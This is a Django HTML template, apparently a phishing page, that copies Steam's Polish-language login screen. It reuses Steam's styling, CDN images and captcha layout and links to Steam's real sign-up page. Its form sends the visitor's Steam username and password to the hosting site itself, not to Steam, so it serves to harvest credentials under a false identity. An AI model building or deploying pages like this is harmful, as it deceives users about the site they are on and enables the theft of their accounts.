{% load staticfiles %}
<html>
    <head>
        <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css">
        <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap-theme.min.css">
        <link rel="stylesheet" href="{% static 'css/blog.css' %}">
        <link href="//fonts.googleapis.com/css?family=Roboto&subset=latin,latin-ext" rel="stylesheet" type="text/css">

        <title>Steam Zaloguj</title>
    </head>
    <body>

        

        <div class="checkout_content_box">
				<div class="loginbox">
					<div class="loginbox_left">
						<h2>Zaloguj</h2>
						<p>Na istniejącym koncie Steam</p>
						<br>
						<form name="logon" action="" method="POST">
							<div class="login_row">
								<div class="input_title">Nazwa konta Steam</div>
								<input class="text_input" type="text" name="username" id="input_username" value="">
							</div>
							<div class="login_row">
								<div class="input_title">Hasło</div>
								<input class="text_input" type="password" name="password" id="input_password" autocomplete="off"/>
							</div>
														<div class="login_row" id="captcha_entry" style="display: none;">
								<div id="captcha_image_row">
									<img style="float: left;" id="captchaImg" src="https://steamstore-a.akamaihd.net/public/images/blank.gif" border="0" width="206" height="40">
									<div id="captchaRefresh">
										<span class="linkspan" id="captchaRefreshLink">Odśwież</span>
									</div>
									<div style="clear: left;"></div>
								</div>
								<br>
								<div class="input_title">Wpisz powyższe znaki</div>
								<input class="text_input" id="input_captcha" type="text" name="captcha_text">
							</div>
							<div style="display: none;"><input type="submit"></div>
						</form>
					</div>
					<div class="loginbox_sep">
					</div>
					<div class="loginbox_right">
						
					</div>
					<div style="clear: left;"></div>
					<div class="loginbox_left btn_ctn">
						<div id="login_btn_signin">
							<button type="submit" class="btnv6_blue_hoverfade  btn_medium">
								<span>Zaloguj</span>
							</button>
						</div>
						<div id="login_btn_wait" style="display: none;">
							<img src="https://steamstore-a.akamaihd.net/public/images/login/throbber.gif">
						</div>
					</div>
					<div class="loginbox_right">
						<a href="https://store.steampowered.com/join/?&snr=1_60_4__62" class="btnv6_blue_hoverfade btn_medium">
							<span>Dołącz do Steam</span>
						</a>
					</div>
					<div style="clear: left;"></div>
				</div>
			</div>
        <div>
            
        </div>
    </body>
</html>
